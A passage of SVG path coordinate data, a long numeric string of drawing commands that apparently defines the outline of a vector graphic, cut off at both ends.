,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-